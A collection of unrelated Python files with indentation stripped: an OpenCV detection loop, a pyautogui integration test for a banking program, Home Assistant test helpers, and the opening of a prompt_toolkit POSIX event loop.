frame = inputQueue.get()
resframe = cv2.resize(frame, (300, 300))
blob = cv2.dnn.blobFromImage(resframe, 1, size=(300, 300), mean=(127.5,127.5,127.5), swapRB=False, crop=False)
net.setInput(blob)
out = net.forward()
data_out = []
for detection in out.reshape(-1, 7):
inference = []
obj_type = int(detection[1]-1)
confidence = float(detection[2])
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
if confidence > 0: #ignore garbage
inference.extend((obj_type,confidence,xmin,ymin,xmax,ymax))
data_out.append(inference)
outputQueue.put(data_out)
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
out = None
# construct a child process *indepedent* from our main process of
# execution
print("[INFO] starting process...")
p = Process(target=classify_frame, args=(net,inputQueue,outputQueue,))
p.daemon = True
p.start()
print("[INFO] starting capture...")
#time the frame rate....
timer1 = time.time()
frames = 0
queuepulls = 0
timer2 = 0
t2secs = 0
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
if queuepulls ==1:
timer2 = time.time()
# Capture frame-by-frame
frame = frame.array
# if the input queue *is* empty, give the current frame to
# classify
if inputQueue.empty():
inputQueue.put(frame)
# if the output queue *is not* empty, grab the detections
if not outputQueue.empty():
out = outputQueue.get()
queuepulls += 1
#print(len(out))
#print(getsizeof(out))
# check to see if 'out' is not empty
if out is not None:
# loop over the detections
for detection in out:
#print(detection)
#print("\n")
objID = detection[0]
confidence = detection[1]
xmin = detection[2]
ymin = detection[3]
xmax = detection[4]
ymax = detection[5]
if confidence > confThreshold:
#bounding box
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 255))
#label
cv2.rectangle(frame, (xmin-1, ymin-1),\
(xmin+70, ymin-10), (0,255,255), -1)
#labeltext
cv2.putText(frame,' '+labels[objID]+' '+str(round(confidence,2)),\
(xmin,ymin-2), font, 0.3,(0,0,0),1,cv2.LINE_AA)
detections +=1 #positive detections
# Display the resulting frame
cv2.rectangle(frame, (0, 0),\
(90, 15), (0,0,0), -1)
#cv2.putText(frame,'Threshold: '+str(round(confThreshold,1)), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.rectangle(frame, (220, 0),\
(300, 25), (0,0,0), -1)
cv2.putText(frame,'VID FPS: '+str(fps), (225, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.putText(frame,'NCS FPS: '+str(qfps), (225, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
#cv2.rectangle(frame, (0, 265),(170, 300), (0,0,0), -1)
#cv2.putText(frame,'Positive detections: '+str(detections), (10, 280), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
#cv2.putText(frame,'Elapsed time: '+str(round(t2secs,2)), (10, 290), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 255, 255), 1, cv2.LINE_AA)
cv2.namedWindow('frame',cv2.WINDOW_NORMAL)
cv2.resizeWindow('frame',frameWidth,frameHeight)
cv2.imshow('frame',frame)
# FPS calculation
frames += 1
if frames >= 1:
end1 = time.time()
t1secs = end1-timer1
fps = round(frames/t1secs,2)
if queuepulls > 1:
end2 = time.time()
t2secs = end2-timer2
qfps = round(queuepulls/t2secs,2)
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
keyPress = cv2.waitKey(1)
if keyPress == 113:
break
if keyPress == 82:
confThreshold += 0.1
if keyPress == 84:
confThreshold -= 0.1
if confThreshold >1:
confThreshold = 1
if confThreshold <0:
confThreshold = 0
cv2.destroyAllWindows()
|
Day4.py
|
import os
import time
import threading
import pyautogui
print("Integration Testing (Day 4) ...")
os.system("mvn compile")
os.chdir("./target/classes")
validAcc = " ../../ValidAccList.txt "
transSumDir = "../../TransactionFiles/"
master = " ../../Master.txt "
def runJava(session, arg1, arg2):
os.system("java main/Quinterac "+session+ arg1 + arg2)
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum1.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("agent")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234567")
pyautogui.press("enter")
pyautogui.write("1500")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum2.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("machine")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234568")
pyautogui.press("enter")
pyautogui.write("13500")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("frontend", validAcc, transSumDir+"TransSum3.txt",))
t.start()
time.sleep(1) # important for race conditions
pyautogui.write("login")
pyautogui.press("enter")
pyautogui.write("agent")
pyautogui.press("enter")
pyautogui.write("withdraw")
pyautogui.press("enter")
pyautogui.write("1234569")
pyautogui.press("enter")
pyautogui.write("79997000")
pyautogui.press("enter")
pyautogui.write("logout")
pyautogui.press("enter")
t = threading.Thread(target=runJava, args=("backend", master, "../../MergeTransSum.txt",))
t.start()
time.sleep(5) # important for race conditions
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import uuid
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml.loader as yaml_loader
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
models as auth_models,
auth_store,
providers as auth_providers,
permissions as auth_permissions,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
SERVER_PORT,
STATE_ON,
STATE_OFF,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import run_callback_threadsafe, run_coroutine_threadsafe
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = mqtt.Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
async def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: "mock-broker"}
with patch("paho.mqtt.client.Client") as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = await async_setup_component(hass, mqtt.DOMAIN, {mqtt.DOMAIN: config})
assert result
await hass.async_block_till_done()
hass.data["mqtt"] = MagicMock(
spec_set=hass.data["mqtt"], wraps=hass.data["mqtt"]
)
return hass.data["mqtt"]
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Integration {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = "homeassistant.components.{}".format(domain)
self.__file__ = "homeassistant/components/{}".format(domain)
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, "setup_component failed, expected {} got {}: {}".format(
count, res_len, res
)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), "Duplicate entity_id? {}".format(
states
)
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split("."))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict("sys.modules", to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_stop_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass,
"homeassistant.components.{}".format(module.DOMAIN),
None,
module.mock_manifest(),
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if platform_name not in integration_cache:
mock_integration(hass, MockModule(platform_name))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache["{}.{}".format(platform_name, domain)] = module
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
|
posix.py
|
from __future__ import unicode_literals
import fcntl
import os
import random
import signal
import threading
import time
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.utils import DummyContext, in_main_thread
from prompt_toolkit.input import Input
from .base import EventLoop, INPUT_TIMEOUT
from .callbacks import EventLoopCallbacks
from .inputhook import InputHookContext
from .posix_utils import PosixStdinReader
from .utils import TimeIt
from .select import AutoSelector, Selector, fd_to_int
__all__ = (
'PosixEventLoop',
)
_now = time.time
class PosixEventLoop(EventLoop):
"""
Event loop for posix systems (Linux, Mac os X).
"""
def __init__(self, inputhook=None, selector=AutoSelector):
assert inputhook is None or callable(inputhook)
assert issubclass(selector, Selector)
self.running = False
self.closed = False
self._running = False
self._callbacks = None
self._calls_from_executor = []
self._read_fds = {} # Maps fd to handler.
self.selector = selector()
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
# Create inputhook context.
self._inputhook_context = InputHookContext(inputhook) if inputhook else None
def run(self, stdin, callbacks):
"""
The input 'event loop'.
"""
assert isinstance(stdin, Input)
assert isinstance(callbacks, EventLoopCallbacks)
assert not self._running
if self.closed:
raise Exception('Event loop already closed.')
self._running = True
self._callbacks = callbacks
inputstream = InputStream(callbacks.feed_key)
current_timeout = [INPUT_TIMEOUT] # Nonlocal
# Create reader class.
stdin_reader = PosixStdinReader(stdin.fileno())
# Only attach SIGWINCH signal handler in main thread.
# (It's not possible to attach signal handlers in other threads. In
# that case we should rely on a the main thread to call this manually
# instead.)
if in_main_thread():
ctx = call_on_sigwinch(self.received_winch)
else:
ctx = DummyContext()
def read_from_stdin():
" Read user input. "
# Feed input text.
data = stdin_reader.read()
inputstream.feed(data)
# Set timeout again.
current_timeout[0] = INPUT_TIMEOUT
# Quit when the input stream was closed.
if stdin_reader.closed:
self.stop()
self.add_reader(stdin, read_from_stdin)
self.add_reader(self._schedule_pipe[0], None)
with ctx:
while self._running:
# Call inputhook.
if self._inputhook_context:
with TimeIt() as inputhook_timer:
def ready(wait):
" True when there is input ready. The inputhook should return control. "
return self._ready_for_reading(current_timeout[0] if wait else 0) != []
self._inputhook_context.call_inputhook(ready)
inputhook_duration = inputhook_timer.duration
else:
inputhook_duration = 0
